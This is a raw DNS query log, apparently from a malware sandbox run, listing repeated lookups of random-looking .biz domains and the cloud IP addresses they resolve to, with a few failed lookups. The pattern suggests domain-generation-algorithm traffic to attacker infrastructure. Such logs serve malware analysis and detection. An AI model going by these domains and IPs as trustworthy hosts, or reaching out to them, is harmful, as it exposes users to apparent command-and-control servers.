                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.839477062 CET1.1.1.1192.168.2.80x53e2No error (0)uaafd.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.338025093 CET1.1.1.1192.168.2.80xc4b7No error (0)oflybfv.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.887512922 CET1.1.1.1192.168.2.80x6e7No error (0)eufxebus.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.207427979 CET1.1.1.1192.168.2.80x9d24No error (0)yhqqc.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.376961946 CET1.1.1.1192.168.2.80x4425No error (0)pwlqfu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.334614038 CET1.1.1.1192.168.2.80x4158No error (0)mnjmhp.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.402151108 CET1.1.1.1192.168.2.80x84a2No error (0)rrqafepng.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.931332111 CET1.1.1.1192.168.2.80xec15No error (0)ctdtgwag.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.011516094 CET1.1.1.1192.168.2.80x9bcbNo error (0)opowhhece.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.710722923 CET1.1.1.1192.168.2.80x86a1No error (0)tnevuluw.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.961292028 CET1.1.1.1192.168.2.80xfebeNo error (0)jdhhbs.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.358434916 CET1.1.1.1192.168.2.80xff72No error (0)whjovd.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.566911936 CET1.1.1.1192.168.2.80x1718No error (0)mgmsclkyu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.819550037 CET1.1.1.1192.168.2.80x47bfNo error (0)gjogvvpsf.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.111799002 CET1.1.1.1192.168.2.80x2451No error (0)warkcdu.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.978058100 CET1.1.1.1192.168.2.80xbaffNo error (0)reczwga.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.662432909 CET1.1.1.1192.168.2.80x921aNo error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.354219913 CET1.1.1.1192.168.2.80x2cd0No error (0)gcedd.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.519217014 CET1.1.1.1192.168.2.80xae3fNo error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.208046913 CET1.1.1.1192.168.2.80x94ccNo error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.016091108 CET1.1.1.1192.168.2.80x5e1No error (0)jwkoeoqns.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.190676928 CET1.1.1.1192.168.2.80xa888No error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.913369894 CET1.1.1.1192.168.2.80x4cddNo error (0)xccjj.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.039856911 CET1.1.1.1192.168.2.80x5020No error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.897775888 CET1.1.1.1192.168.2.80x4acdNo error (0)pectx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.930977106 CET1.1.1.1192.168.2.80x73b5No error (0)hehckyov.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.748326063 CET1.1.1.1192.168.2.80x2886No error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.852551937 CET1.1.1.1192.168.2.80x2246No error (0)rynmcq.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.464489937 CET1.1.1.1192.168.2.80xd588No error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.154396057 CET1.1.1.1192.168.2.80x6fbbNo error (0)uaafd.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.158426046 CET1.1.1.1192.168.2.80x77d1No error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.442310095 CET1.1.1.1192.168.2.80x265aNo error (0)eufxebus.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.738931894 CET1.1.1.1192.168.2.80x7c37No error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.429670095 CET1.1.1.1192.168.2.80x86a5No error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.194180012 CET1.1.1.1192.168.2.80xd26cNo error (0)pwlqfu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.899344921 CET1.1.1.1192.168.2.80xcbe2No error (0)xyrgy.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.589617968 CET1.1.1.1192.168.2.80x29deNo error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.589617968 CET1.1.1.1192.168.2.80x29deNo error (0)htwqzczce.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.834978104 CET1.1.1.1192.168.2.80x14acNo error (0)rrqafepng.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.268014908 CET1.1.1.1192.168.2.80x1cd0No error (0)kvbjaur.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.122436047 CET1.1.1.1192.168.2.80xa0b3No error (0)uphca.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.278775930 CET1.1.1.1192.168.2.80x6d4bNo error (0)ctdtgwag.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.827486992 CET1.1.1.1192.168.2.80x8688No error (0)fjumtfnz.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.369088888 CET1.1.1.1192.168.2.80x4803No error (0)tnevuluw.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.701540947 CET1.1.1.1192.168.2.80x9178No error (0)hlzfuyy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.834882021 CET1.1.1.1192.168.2.80x2d67No error (0)whjovd.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.974674940 CET1.1.1.1192.168.2.80x88f4No error (0)rffxu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.959924936 CET1.1.1.1192.168.2.80xba89No error (0)cikivjto.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.093523026 CET1.1.1.1192.168.2.80xbc92No error (0)gjogvvpsf.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.802927971 CET1.1.1.1192.168.2.80xb148No error (0)qncdaagct.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:13.773571014 CET1.1.1.1192.168.2.80x5879No error (0)reczwga.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:14.313174963 CET1.1.1.1192.168.2.80xa221No error (0)shpwbsrw.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.133600950 CET1.1.1.1192.168.2.80x8896No error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:15.772970915 CET1.1.1.1192.168.2.80xcf91No error (0)cjvgcl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.456342936 CET1.1.1.1192.168.2.80x4b13No error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:16.650964022 CET1.1.1.1192.168.2.80xbcecNo error (0)neazudmrq.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.344456911 CET1.1.1.1192.168.2.80x8752No error (0)pgfsvwx.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:17.740942955 CET1.1.1.1192.168.2.80xfeadNo error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:18.112207890 CET1.1.1.1192.168.2.80xe4faNo error (0)aatcwo.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.371090889 CET1.1.1.1192.168.2.80xf79bNo error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:19.691520929 CET1.1.1.1192.168.2.80x2d53No error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.394785881 CET1.1.1.1192.168.2.80x5c34No error (0)nwdnxrd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:20.426985025 CET1.1.1.1192.168.2.80xd7d6No error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.476361036 CET1.1.1.1192.168.2.80x490fNo error (0)ereplfx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.494420052 CET1.1.1.1192.168.2.80x359cNo error (0)pectx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.336982012 CET1.1.1.1192.168.2.80x33f0No error (0)ptrim.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.495480061 CET1.1.1.1192.168.2.80xc60aNo error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.366878033 CET1.1.1.1192.168.2.80xb03cNo error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.794403076 CET1.1.1.1192.168.2.80x4a9cNo error (0)znwbniskf.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:24.291723967 CET1.1.1.1192.168.2.80x4d9No error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.283523083 CET1.1.1.1192.168.2.80x4199No error (0)cpclnad.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.970505953 CET1.1.1.1192.168.2.80x7f00No error (0)mjheo.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.128007889 CET1.1.1.1192.168.2.80x6ffdNo error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.655203104 CET1.1.1.1192.168.2.80xd7cbNo error (0)wluwplyh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.981818914 CET1.1.1.1192.168.2.80xb5aaNo error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.121867895 CET1.1.1.1192.168.2.80xc9f9No error (0)zgapiej.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.639738083 CET1.1.1.1192.168.2.80x3ec7No error (0)xyrgy.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.804352045 CET1.1.1.1192.168.2.80x4b1cNo error (0)jifai.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.519270897 CET1.1.1.1192.168.2.80x9b1bNo error (0)xnxvnn.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.607933044 CET1.1.1.1192.168.2.80x9020No error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.607933044 CET1.1.1.1192.168.2.80x9020No error (0)htwqzczce.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.098376036 CET1.1.1.1192.168.2.80x5fdNo error (0)ihcnogskt.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.232258081 CET1.1.1.1192.168.2.80x4a45No error (0)kvbjaur.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.952222109 CET1.1.1.1192.168.2.80x356bNo error (0)kkqypycm.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.249808073 CET1.1.1.1192.168.2.80xb6d8No error (0)uphca.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.075750113 CET1.1.1.1192.168.2.80x855fNo error (0)fjumtfnz.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.501965046 CET1.1.1.1192.168.2.80x2585No error (0)uevrpr.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.337529898 CET1.1.1.1192.168.2.80x2895No error (0)fgajqjyhr.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.401423931 CET1.1.1.1192.168.2.80x3b7cNo error (0)hlzfuyy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.392970085 CET1.1.1.1192.168.2.80x60a7No error (0)hagujcj.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.532113075 CET1.1.1.1192.168.2.80xe98aNo error (0)rffxu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.089349985 CET1.1.1.1192.168.2.80xee65No error (0)sctmku.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.740919113 CET1.1.1.1192.168.2.80xb4c8No error (0)cikivjto.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.958873034 CET1.1.1.1192.168.2.80xf4dbNo error (0)qcrsp.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.760453939 CET1.1.1.1192.168.2.80xd7aaNo error (0)qncdaagct.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.912180901 CET1.1.1.1192.168.2.80x95f8No error (0)sewlqwcd.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.180849075 CET1.1.1.1192.168.2.80xe7e5No error (0)dyjdrp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.429605007 CET1.1.1.1192.168.2.80x51c9No error (0)shpwbsrw.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.060884953 CET1.1.1.1192.168.2.80xf758No error (0)napws.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.928776979 CET1.1.1.1192.168.2.80x82e9No error (0)qvuhsaqa.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.124875069 CET1.1.1.1192.168.2.80xae98No error (0)cjvgcl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.784631014 CET1.1.1.1192.168.2.80x5a19No error (0)apzzls.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.843357086 CET1.1.1.1192.168.2.80x9249No error (0)neazudmrq.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.825274944 CET1.1.1.1192.168.2.80x4641No error (0)krnsmlmvd.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.897753000 CET1.1.1.1192.168.2.80xfcc3No error (0)pgfsvwx.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.946619034 CET1.1.1.1192.168.2.80xa1a7No error (0)aatcwo.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.332935095 CET1.1.1.1192.168.2.80x2748No error (0)nlscndwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.370387077 CET1.1.1.1192.168.2.80x8aeaNo error (0)bzkysubds.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.484617949 CET1.1.1.1192.168.2.80x324No error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.050936937 CET1.1.1.1192.168.2.80xd235No error (0)ltpqsnu.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.390686035 CET1.1.1.1192.168.2.80xbf70No error (0)nwdnxrd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.744389057 CET1.1.1.1192.168.2.80x58e5No error (0)vnvbt.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.505466938 CET1.1.1.1192.168.2.80xe05bNo error (0)ereplfx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.588015079 CET1.1.1.1192.168.2.80xa43bNo error (0)ypituyqsq.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.292068005 CET1.1.1.1192.168.2.80x80d3No error (0)ijnmvqa.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.656529903 CET1.1.1.1192.168.2.80xca19No error (0)ptrim.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.163058043 CET1.1.1.1192.168.2.80xc009No error (0)tltxn.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.848386049 CET1.1.1.1192.168.2.80x674eNo error (0)vgypotwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.324826002 CET1.1.1.1192.168.2.80xd19dNo error (0)znwbniskf.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.709767103 CET1.1.1.1192.168.2.80x446eNo error (0)giliplg.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.580981016 CET1.1.1.1192.168.2.80xf11aNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.140692949 CET1.1.1.1192.168.2.80x7d41No error (0)cpclnad.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.140779972 CET1.1.1.1192.168.2.80x7d41No error (0)cpclnad.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.495069981 CET1.1.1.1192.168.2.80x727fNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.834501982 CET1.1.1.1192.168.2.80x7adeNo error (0)mjheo.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.517462015 CET1.1.1.1192.168.2.80x8dNo error (0)wluwplyh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.947649956 CET1.1.1.1192.168.2.80x59adNo error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.802880049 CET1.1.1.1192.168.2.80x411No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.965199947 CET1.1.1.1192.168.2.80xc005No error (0)zgapiej.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.512531996 CET1.1.1.1192.168.2.80x5117No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.512531996 CET1.1.1.1192.168.2.80x5117No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.894834995 CET1.1.1.1192.168.2.80x1773No error (0)jifai.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.617022991 CET1.1.1.1192.168.2.80x508bNo error (0)xnxvnn.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.876637936 CET1.1.1.1192.168.2.80xf395Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.884747982 CET1.1.1.1192.168.2.80x3f2eNo error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.082101107 CET1.1.1.1192.168.2.80x8e5eNo error (0)ihcnogskt.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.328636885 CET1.1.1.1192.168.2.80x7234Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.337044001 CET1.1.1.1192.168.2.80xdeb4Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.345153093 CET1.1.1.1192.168.2.80x60b2No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.169564009 CET1.1.1.1192.168.2.80x778eNo error (0)kkqypycm.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:02.659564972 CET1.1.1.1192.168.2.80x3a4bNo error (0)uevrpr.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.065604925 CET1.1.1.1192.168.2.80x575cNo error (0)fgajqjyhr.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.929606915 CET1.1.1.1192.168.2.80x4790No error (0)hagujcj.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.626234055 CET1.1.1.1192.168.2.80x303aNo error (0)sctmku.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.669536114 CET1.1.1.1192.168.2.80x281aNo error (0)qcrsp.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.669550896 CET1.1.1.1192.168.2.80x281aNo error (0)qcrsp.biz34.211.97.45A (IP address)IN (0x0001)false
